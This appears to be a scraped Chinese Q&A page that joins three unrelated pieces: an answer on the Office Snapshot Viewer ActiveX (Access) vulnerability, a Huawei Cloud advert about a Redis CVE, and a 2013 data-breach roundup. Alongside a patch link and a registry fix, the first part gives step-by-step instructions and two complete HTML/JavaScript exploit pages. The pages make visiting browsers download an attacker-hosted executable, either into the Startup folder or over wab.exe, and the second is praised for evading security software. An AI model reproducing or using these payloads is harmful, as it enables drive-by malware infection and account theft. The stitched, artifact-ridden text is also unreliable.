Access数据库的漏洞有那些?哪位高手指教一下!

Access数据库的漏洞有那些?哪位高手指教一下!,第1张

有网页自己看也行..看我发的也行: http://www.chinaz.com/Program/Access/0Z93KC2008.html Access漏洞威胁的潜在人群十分巨大。目前已经有不少利用该漏洞的恶意网站了,一旦用户访问这些页面就会被植入木马下载器,这些木马下载器成功进入用户系统并执行后,就会下载其他的恶意程序木马,试图盗取用户的QQ、网游等账号,危险不言而喻。 本次Access漏洞除Office2007版本外,在以前的版本中广泛存在。由于用户在安装Office的时候很多都是选择的默认安装,附带也安装了Access,所以漏洞威胁的用户群数量非常的巨大。 HTTP GET功能导致漏洞出现 本次的Access漏洞的全名称为“Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞”,是一个ActiveX控件漏洞。该漏洞存在于snapview.ocx控件中,出现的原因是因为该控件具有HTTP GET功能,这个功能可以从指定的网址下载指定的文件。 黑客要利用该漏洞,先要特制一个恶意网站引诱用户访问。当用户打开该网页的时候,恶意网址就赋给了HTTP GET功能,该功能被激活后就偷偷从恶意网址下载病毒,这样病毒就可以神不知鬼不觉地进入用户的系统中,威胁用户的各种账号和密码。受这个漏洞影响的Access版本有2003、2002、2000。 Access漏洞解决方案 方案1:现在已经有了该漏洞的补丁了,请大家赶快到 http://www.shudoo.com/bzsoft 下载。此外,我们还可以在“工具→Internet选项→安全”中,选择“Internet”图标,然后将下面的安全级别中设置为“高”(图3),这样可以有效地阻止网页木马入侵。 图3 方案2 :将以下内容复制在记事本中,另存为1.reg,然后双击导入注册表也可以堵上漏洞。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}] “Compatibility Flags”=dword:00000400 目前黑客利用Access漏洞的主要方式 方式1:写入启动项 先申请一个免费的Web空间,用Mini downloader by SEC配置网页木马,在“URL”处输入网页木马地址,再点击“Creat”,又再d出窗口中将文件保存为test.exe,这样就网页木马就配置好了。 接着将test.exe上传到先前申请的免费空间里面,病毒地址就是:http://(这里是申请的空间地址)/test.exe 。将以下漏洞的利用代码复制粘贴到新建的记事本里,另存为test.html。 <html><object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object><script language='javascript'>var buf1 = ‘http://(这里是申请的空间地址)/test.exe'var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'obj.SnapshotPath = buf1obj.CompressedPath = buf2</script></html> 最后将test.html上传到空间里,得到病毒的访问地址:http://(这里是空间地址)/test.html。做到这步,剩下的工作就是传播网址引诱用户访问了。当用户访问该网页时就会中招,用户的电脑会在启动项里出现test.exe文件。 点评: 这种方式有个缺点,就是有些安全软件会提示有程序写入启动项。 方式2:不写入启动项 将以下代码复制到新建的记事本中,另存为test.html上传到空间即可。当用户访问该网页时也会中招,不过启动项里没有test.exe文件,用户无法察觉自己中毒了。 <html><body><script type="text/javascript">function killErrors() { return true} window.onerror = killErrorsvar xvar objvar mycars = new Array()mycars[0] = "C:/Program Files/Outlook Express/wab.exe"mycars[1] = "d:/Program Files/Outlook Express/wab.exe"var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1")if(objlcx="[object]") { setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url])for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://(这里是申请的空间地址)/test.exe'var buf2=mycars[x]obj.Zoom = 0obj.ShowNavigationButtons = falseobj.AllowContextMenu = falseobj.SnapshotPath = buf1try { obj.CompressedPath = buf2obj.PrintSnapshot()}catch(e){} } } </script></body></html>点评: 这种方式无需写入启动项,这样安全软件就不会有任何提示了,在用户访问恶意页面的时候直接中马,使用户中马的概率更高。

2021年7月22日,Redis官方和开源Redis社区先后发布公告,披露了CVE-2021-32761 Redis(32位)远程代码执行漏洞。在32位Redis中,攻击者在Redis存在未授权访问的情况下可利用*BIT*命令与proto-max-bulk-len配置参数可能造成整形溢出,最终导致远程代码执行,本次漏洞等级为高危级别。需要说明的是,本次开源Redis的安全漏洞并不影响现网华为云GaussDB(for Redis)的任何实例,已经在使用华为云GaussDB(for Redis)的用户请继续放心使用。

通过本次漏洞可以发现,开源Redis对BITFIELD等命令的代码实现上存在问题,导致了对string数据类型的 *** 作存在安全隐患。随时可能被恶意触发整形溢出BUG,甚至还会被恶意执行远程代码。因此,给了黑客可乘之机。本次漏洞的代码修复已经发布,官方建议用户尽快升级到开源Redis6.2.5, 6.0.15, 5.0.13这三个安全版本。

那么,对于此类数据库安全漏洞该如何防患于未然呢?

数据库漏洞属于软件漏洞中的一种,主要是被用来突破系统的安全策略。数据库漏洞往往会影响很大一个范围,除了影响数据库自身,还包括数据库所在 *** 作系统和数据库所在局域网的整体安全。通常来说,防范和补救措施有:1. 紧跟官方通知,排查并升级数据库到安全版本。本次漏洞事件中,开源Redis用户应第一时间完成升级;2. 若短时无法升级,则从服务端开启访问限制,禁用危险命令;3. 通过白名单访问IP等安全策略,提高入侵难度;4. 选择可靠的云服务厂商,比如迁移至华为云数据库GaussDB(for Redis),可全方位保障数据的安全可靠。

1.全新数据编码更安全: 华为云数据库GaussDB(for Redis)采用先进存算分离架构,兼容Redis协议,提供海量数据的持久化存储。在代码实现上完全自研,采用全新数据编码,更高效,空间使用率也更高。内部每种命令的实现并不依赖开源Redis,因此,不会受到类似本次开源Redis安全漏洞的影响。

2. 安全防护体系全面保障: 基于华为云可靠的现网安全体系,使用GaussDB(forRedis)的用户可以随时制定自己的白名单IP访问策略。还可以通过虚拟私有云、子网、安全组、DDoS防护以及SSL安全访问等多层安全防护体系,有力地抗击各种恶意攻击,保证数据安全,不给未知来源的恶意访问留有任何机会。

华为云数据库GaussDB(forRedis)是一款完全自研的旗舰产品,是支持Redis协议的NoSQL数据库,而不是缓存。与开源Redis最大的区别是,它具备存算分离架构,提供强大的数据存储能力,包括强一致、d性扩缩容等高级特性。GaussDB(for Redis)为用户带来了更低成本、更大容量、更高可靠、且d性伸缩的极佳产品体验。

对于正在使用开源Redis2.6以上各版本的用户,GaussDB(for Redis)还提供了一站式的迁移服务,无需技术门槛, *** 作简单快捷,仅需分钟级就能搭建起迁移任务,让整个环境搭建“高效快速”,为企业上云保驾护航,再无安全之忧。

伴随数据价值的不断提升,作为海量数据的载体,数据库所需面对的安全隐患和风险也水涨船高,但无论是DBA还是云服务厂商都应该树立良好的安全意识,才能更好的保障数据库安全。华为云数据库将持续满足不同数据库的安全防护需求,为数据库及数据安全建设发展提供有力支撑,让用户对数据使用更自由、更安全!

泄露事故统计数字正在逐步下降,但数据仍然面临着由数据库、应用以及终端保护不当所引发的严重风险。

从多个角度来看,2013年的数据泄露趋势已经得到有效扼制,这对于安全行业来说当然是个好消息。不同于过去四到五年,今年的记录当中不再充斥着大型数据库泄露所导致的数以千万计个人身份信息的外流。根据隐私权信息交流中心的调查,本年度公开报道的泄露事故数量及记录在案的泄露事故数量双双呈下降趋势。去年同期,得到确切统计的记录泄露数量已经达到约278万条,漏洞报告则为637份。而在今年,目前为止记录在案的泄露事故约为107万条,漏洞报告则为483份。这充分证明整个安全行业在合规性与安全最佳实践方面所迎来的进步——然而这样的战绩与理想目标相比仍然相去甚远。

在对年初至今的数字进行比较时,我们发现记录在案的泄露事故数量大幅降低了61.7%,然而报告提及的泄露事故数量则仅降低了24.2%。这表明泄露事故仍然快速发生——只不过如今的犯罪活动及违规事件开始逐步扩散而非集中于一点。泄露事件影响范围更小,而且根据安全业内人士的说法,此类恶意活动的目标也更为广泛。现在犯罪分子开始更多地窃取IP或者其它数字资产,由此引发的损失可能比客户记录本身更为严重——同时这也更加难以量化,无法提供头条新闻所必需的统计结果。

通过对今年发生的泄露事故的深入钻研,我们发现安全行业明显仍有大量工作要做。2013年的追踪记录证明,有价值数据库仍然没有受到严格保护与加密、应用程序仍然存在大量安全漏洞、用户们则仍然能够从敏感数据库中下载大量信息并将其保存在缺乏保护的终端当中。为了帮助大家更好地理解当前安全形势,我们选取了几项最具代表意义的实例,希望各位能够从中吸取可资借鉴的教训。

当事企业: CorporateCarOnline.com

泄露统计: 850,000份记录被盗

事故细节:作为全美最具知名度的专业体育、娱乐外加五百强企业,CorporateCarOnline.com拥有大量用户个人资料、xyk号码以及其它个人身份信息,然而由于其开发出的全球豪车租赁SaaS数据库解决方案将全部信息以纯文本形式储存,最终导致这一切成为犯罪分子的囊中之物。名单中涉及不少大牌,包括汤姆·汉克斯、汤姆·达施勒以及唐纳德·特朗普等。

经验教训:最重要的教训在于认清这样一个现实:面对极具价值的财务与社会工程信息,攻击者们会爆发出极为可怕的技术能量。根据KrebsOnSecurity.com网站的调查,目前遭遇过违规活动的美国运通卡当中有四分之一为高额度甚至无限额度卡片,而且企业间谍分子或者娱乐小报记者也希望通过这类个人信息挖掘到有价值结论。与此同时,该公司在管理收支账目时完全没有考虑过信息安全性,甚至从未尝试采取任何最基本的加密措施。

当事企业: Adobe

泄露统计: 约三百万个人身份信息、超过1.5亿用户名/密码组合以及来自Adobe Acrobat、ColdFusion、ColdFusion Builder外加其它未说明产品的源代码惨遭窃取。

事故细节: 自最初的违规事件发生之后,接踵而来的更多攻击活动持续了一个多月之久,并最终导致了此次重大事故的发生。目前情况已经明确,Adobe正在努力恢复其失窃的大量登录凭证信息——更令人惊讶的是,连其产品源代码也一并泄露。

经验教训: 通过Adobe遭遇的这一轮震惊世界的攻击活动,我们不仅切身感受到攻击者在企业网络中建立根据地并夺取了整套业务储备控制权后所能带来的损害,同时也应学会在考虑将供应商引入软件供应链之前、考察对方在安全领域营造出了怎样的企业生态。作为此次泄露事故的后续影响,其潜在后果恐怕在很长一段时间内都无法彻底消除。

当事企业: 美国能源部

泄露统计: 53000位前任及现任能源部员工的个人身份信息遭到窃取

事故细节: 攻击者将矛头指向了DOEInfo——该机构利用ColdFusion所打造的、已经弃之不用的CFO办公室公开访问系统。能源部官员表示,此次泄露事故只限于内部员工的个人身份信息。

经验教训: 我们从中应该吸取两大教训。首先,安装补丁过去是、现在是、未来也将一直是最为重要的安全任务。其次,各机构必须通过重新审视与敏感数据库相对接的系统最大程度减少攻击面,保证只向公众开放必要的网站。

当事企业: Advocate Medical Group

泄露统计: 四百万病人记录遭到窃取

事故细节: 仅仅由于犯罪分子从办公室里偷走了四台由该公司拥有的计算机,最终导致了这起四百万病人记录丢失的事故——公司官方将此称为自2009年卫生部强制要求通告安全事故以来、美国发生过的第二大医疗信息泄露案件。

经验教训: 医疗行业的数据泄露事故在2013年的违规披露名单当中一直占据主导,但这一次的案件造成的影响显然特别恶劣。仅仅由于一台物理计算设备失窃就最终导致从上世纪九十年代至今的病人记录泄露,这充分暴露了该公司在物理安全、终端安全、加密以及数据保护等各个方面的全线失误。需要强调的是,终端设备被盗与丢失在医疗行业中已经屡见不鲜。现在这些机构可能需要尽快思考终端设备到底能够下载并保存多少来自中央数据库的信息。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/sjk/9648190.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-30
下一篇 2023-04-30

发表评论

登录后才能评论

评论列表(0条)

保存